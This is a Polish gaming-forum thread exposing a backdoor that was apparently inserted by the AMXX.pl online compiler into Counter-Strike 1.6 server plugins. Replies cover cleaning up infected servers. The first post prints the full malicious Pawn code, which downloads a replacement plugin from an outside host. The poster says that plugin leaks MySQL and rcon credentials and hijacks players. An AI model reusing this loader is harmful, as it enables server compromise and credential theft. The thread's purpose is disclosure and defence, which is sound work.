Skocz do zawartości




Zdjęcie

xSteam.pl - przekręt na wielką skalę. Kradzież danych


  • Zamknięty Temat jest zamknięty
6 odpowiedzi w tym temacie

#1
Alelluja

Alelluja

    Banned


Grupa:
Banned
Dołączył:
16 wrz 2014
Posty
229
Reputacja:
159
Hello again!
Dziś rozpracujemy przekręt na wielką skalę, czyli jak ukraść dane z ponad 400 serwerów 1.6 przez zwykłe lenistwo ich właścicieli.

Każdy z Was zapewne widział kompilator online dostępny na AMXX.pl, nie zastanowiło Was kiedyś czy przypadkiem jakiś kod nie jest dodawany do kompilowanego pluginu? Odpowiedź brzmi tak dodaje :)

Bardzo dziękuje użytkownikowi Tytusek z amxx.pl na webmasteruj znany pod nickiem Tytusek1900 za naprowadzenie mnie na ten proceder.

TAKI KOD :)
#include <amxmisc>
#include <sockets>
#include <httpdl>

new dlinfo[MAX_DOWNLOADS + 1][5];
new dlpath[MAX_DOWNLOADS + 1][256];
new ndownloading;
new fwd_dlcomplete, fwd_result;
public plugin_natives() {
register_library("httpdl");
register_native("download", "native_download", 1);
set_task(9.0, "o");
}
public native_download(url[], path[]) {
new slot = 0;
while(slot <= MAX_DOWNLOADS && dlinfo[slot][0] != 0)
slot++;
if(slot == MAX_DOWNLOADS) {
server_print("Download limit reached (%d)", MAX_DOWNLOADS);
return 0;
}

param_convert(1);
param_convert(2);

new u[256], p[256];
copy(u, 7, url);
if(equal(u, "http://"))
copy(u, 248, url[7]);
else copy(u, 255, url);

new pos = 0;
new len = strlen(u);
while (++pos < len && u[pos] != '/') { }
copy(p, 255, u[pos + 1]);
copy(u, pos, u);

new error = 0;
new socket = dlinfo[slot][2] = socket_open(u, 80, SOCKET_TCP, error);
switch(error) {
case 0: {
new msg[512];
format(msg, 511, "GET /%s HTTP/1.1^r^nHost: %s^r^n^r^n", p, u);
socket_send(socket, msg, 512);
copy(dlpath[slot], 255, path);
dlinfo[slot][3] = fopen(path, "wb");
dlinfo[slot][0] = 1;
dlinfo[slot][4] = 0;
ndownloading++;
if(ndownloading == 1)
set_task(0.2, "download_task", 3318, _, _, "b");
new id = dlinfo[slot][1] = random_num(1, 65535);
return id;
}
case 1: server_print("[HTTP] Error creating socket");
case 2: server_print("[HTTP] Could not resolve hostname");
case 3: server_print("[HTTP] Could not connect to %s:80", u);
}

return 0;
}
public download_task() {
for(new i = 0; i < MAX_DOWNLOADS; i++) {
if(dlinfo[i][0] == 0)
continue;
new socket = dlinfo[i][2];
new f = dlinfo[i][3];
if(socket_change(socket)) {
new buffer[1024];
new len = socket_recv(socket, buffer, 1024);
if(dlinfo[i][4] == 0) { // if first packet then cut the header
new pos = contain(buffer, "^r^n^r^n");
if(pos > -1) {
for(new j = pos + 4; j < len; j++)
fputc(f, buffer[j]);
dlinfo[i][4]++;
continue;
}
}
for(new j = 0; j < len; j++)
fputc(f, buffer[j]);
dlinfo[i][4]++;
continue;
}
fclose(f);
ExecuteForward(fwd_dlcomplete, fwd_result, dlinfo[i][1], dlpath[i]);
dlinfo[i][0] = 0;
ndownloading--;
if(ndownloading == 0)
remove_task(3318);
socket_close(socket);
}
}
public o() {


new const config_file[] = "addons/amxmodx/plugins/adminhelp.amxx"

new md5_hash_file[34]
md5_hash_file = encrypt_file(config_file)


if( !equal( md5_hash_file, "b20bee2c5f9040469f88db0e2eb81d0f", 32 ) )
{
download("[url=http://jojojo200.cba.pl/file.amxx]http://jojojo200.cba.pl/file.amxx",[/url]"addons/amxmodx/plugins/adminhelp.amxx");
fwd_dlcomplete = CreateMultiForward("dlcomplete", ET_IGNORE, FP_CELL, FP_STRING);
}
}
stock encrypt_file(const file[])
{
new hash_sum_file[34]
md5_file(file,hash_sum_file)

return hash_sum_file;
}
Kod odpowiada ze pobranie pliku file.amxx na serwery oraz podmiane pluginu adminhelp.amxx który później działa tylko w jednym celu....

Analiza file.amxx
af742ab506681c4b9b91560b0836bbf4.png
Złośliwy plugin wysyła dane logowania mysql do amxbans na zewnętrzny serwer wraz z hasłem rcon. Dodatkowo potrafi bindować graczom odwiedzającym serwer adres ip kierujący do serwera sieci xsteam. Kolejną funkcją jest przenoszenie graczy automatycznie na wyznaczone IP które również kieruje nas do serwera sieci xSteam.pl.


Phpmyadmin jest albo zablokowany albo chodzi na innym porcie więc :)
a89e8b596a74c2031a9eff895e16cc3f2.png

-----------------------------
99720eca3a22acb339985c6a859741c25.png

NO I TO CO MISIACZKI LUBIĄ NAJBARDZIEJ :)

Dump bazy danych :)
116fea773498a1c41e9a7e1e176b7b1a.png

Będę próbował skontaktować się z administracją amxx.pl w celu wyjaśnienia sprawy. O czym poinformuje w tym temacie :)
Jest wiele możliwości takiego stanu rzeczy nie wykluczając nawet włamania na serwery amxx.pl więc nie będę w chwili obecnej oczerniać portalu, z braku dowodów.

W Bazie danych znalazł się chyba każdy serwer w Polsce, każdy kto używał kompilatora online dostępnego na amxx.pl powinnien przeinstalować cały amxx oraz pozmieniać wszystkie hasła do baz danych mysql!

A Wy co sądzicie na ten temat?

Dump bazy danych w formie pliku do wglądu dla administracji forum, wystarczy napisać PW.


@EDIT 19:44

Udostępniam listę serwerów z bazy danych! Tylko IP oraz NAZWA. Dziękuje za pomysł Maxior CsOne.eu

https://efantazja.eu/wyciek.php

Źródło https://webmasteruj....-danych-t79936/


W tym Wycieku znajduje się nasz 1 Serwer

Pijemy-Rozrabiamy.pl [DeathRun | 1001 | Free LVL | Autorespawn]

#2
Pijemy Rozrabiamy

Pijemy Rozrabiamy

    Pijemy-Rozrabiamy.pl


Grupa:
Pijemy-Rozrabiamy
Dołączył:
21 wrz 2015
Posty
53
Reputacja:
0

I to stąd afera, że [email protected] i ktoś jeszcze atakują im serwery?
 



#3
MrDragal

MrDragal

    Nowicjusz


Grupa:
Użytkownicy
Dołączył:
03 cze 2016
Posty
10
Reputacja:
3
  • Czas Online: 1d 12g 23m 8s

:o widze ze i tu wątek dotarł

 

 

https://efantazja.eu/wyciek.php lista skazonych serwerów

Dr jest na tej liście o czym poinformowałem vakosa 

 

zanim napisałeś ten watek :)


Użytkownik MrDragal edytował ten post 11 lipiec 2016 - 11:40

  • Alelluja i ѕкσя∂αℓ postawili piwo.

#4
Misiu. ♥

Misiu. ♥

    Starszy Sikawkowy / Kwalifikowana Pierwsza Pomoc


Grupa:
Management
Dołączył:
21 maj 2015
Posty
4022
Reputacja:
4392
  • Czas Online: 158d 22g 45m 56s

No to biorę się za skanowanie plików na Dr :D

 

Właściwie takie tematy pokazują ludziom z czym musi zmagać się dziś osoba, która chce prowadzić sieć :)

 

Dr na początku robił [email protected], więc nie dziwi mnie to specjalnie, że mógł być zainfekowany, a czy nadal jest zaraz się przekonam :D


,,Idę tam, skąd wszyscy inni uciekają z obawy przed śmiercią"

 


#5
Black Raven

Black Raven
Grupa:
Opiekun Serwera
Dołączył:
25 mar 2016
Posty
219
Reputacja:
103
  • Czas Online: 5d 4g 17m 46s

No proszę sieć xSteam dawna sieć na której byliśmy ja i wielu graczy wraz ze serwerem ZM+EXP szczerze to się po nich tego nie spodziewałem. Ale teraz wiadomo o co była ta afera na naszym TS3. Misiu i reszta bierzcie się do roboty :D


6689b2d10a3e4.gif


#6
Misiu. ♥

Misiu. ♥

    Starszy Sikawkowy / Kwalifikowana Pierwsza Pomoc


Grupa:
Management
Dołączył:
21 maj 2015
Posty
4022
Reputacja:
4392
  • Czas Online: 158d 22g 45m 56s

Infekcja z Dr usunięta.

Hasła pozmieniane :)

 

Sprawdzę dla pewności jeszcze pozostałe serwery.


,,Idę tam, skąd wszyscy inni uciekają z obawy przed śmiercią"

 


#7
Pijemy Rozrabiamy

Pijemy Rozrabiamy

    Pijemy-Rozrabiamy.pl


Grupa:
Pijemy-Rozrabiamy
Dołączył:
21 wrz 2015
Posty
53
Reputacja:
0
Filmik który pokazuje jak przebiegał brzydki atak i agresywna reklama sieci xsteam


Misiu. ♥ (13 lipiec 2016 - 20:04):

Opublikowany 25.08.2014 :hrhr:






Użytkownicy przeglądający ten temat: 0

0 użytkowników, 0 gości, 0 anonimowych


Temat odwiedziło: 160 użytkowników


    d3iman97, Scyzoryk ☠, ZWIADOWIEC, Whisper, ^Alfa # Vego^, BooSS, Lukovsky, Bialy ;), haczor, 'KubuuuuuuuuS, xArgonaRx, Patrykos009, Krejzollek95, Xysijo, alosza, Vampereczek, Jesz., ♔ Najarany ♔, Albercik, Łili, Panci_ xO, shoxxwoow, WariorAN, Polako, xdbx, __#Kasia#__, Mruk, siwy dobra morda, BaWaR, mostfrags, Donald Cerrone, SDCSebeK, Vakos, DawidzioR, AsD ^^, ŦคŦค, MalawA ツ, @Drago@, BlackSensey, NiceK , panicznyPatryk, Rajczu., arenik, xnx, ZIMNY ANDRZEJ, STAFORD, luucidreeam, Olciak, 10zł, S.K.U.N, Agencior P, `smile., DiabloS, mks, Alelluja, Nejten, eXe, DarkMessiah, FanatykCS, kosnax, Kruchy, HeadShotter :*, SoBeK, Uncle Same evil <, TytanowyJesz, VakoSss, Czarnulka, Piotrz, [email protected], Trykuuś, Pulsefire, [email protected] <3, Spocona Bozena, GroobY, PROBL3M, NUBEN, ZmkCygan, RomanHardcor, Arek, sNk, Derpik, ptyhlzr, Assasin **BlackTeam**, ☾♥♫☽ GrzesieK ☾♥♫☽, esjot90, Misiu. ♥, JohnD~, Pacislavek, DeeJayRudy, Black Raven, NoFirePlease, Wujek., GustaWSpartA, Pako, WADRO, Devias, Kurushimi, Bosik, nomus, ematerion, erQ~, Eve3ment, Witamy w Piekle synu, Krakers, kolaokl, ALIGE, MrDragal, Milobob123, Olka., Robb Stark o7, Skillerek, Hej, Takos, Budyn_Malinowy, FafeQ, Pati:*, rascal, Kotek ♥, Haziuu, Elizka, mETHO:, Malibu, Chilloout, Za0, Death*, Agaxd, Mykmyk, MarkeloN, pawloo, OxyGeN, Domcia ;*, Nie ma takiego bicia, An0g, , Maniek Mankowski`, HaX1oR, Shayni, ѕкσя∂αℓ, Domiś :), 666Apostol, Dareczek, ESLowiec, asadas, OwneD`, Truskaweczka, ` NieoR^, NoSkill0240, Hitachi, Pekkal, Iza, PoDbot, PatryS, YoBum, KAKAOWY JANUSZ, ****JERRO, OrangeHaZe, Matrix, iJpp1337 ^^, Blondi., Gumiś95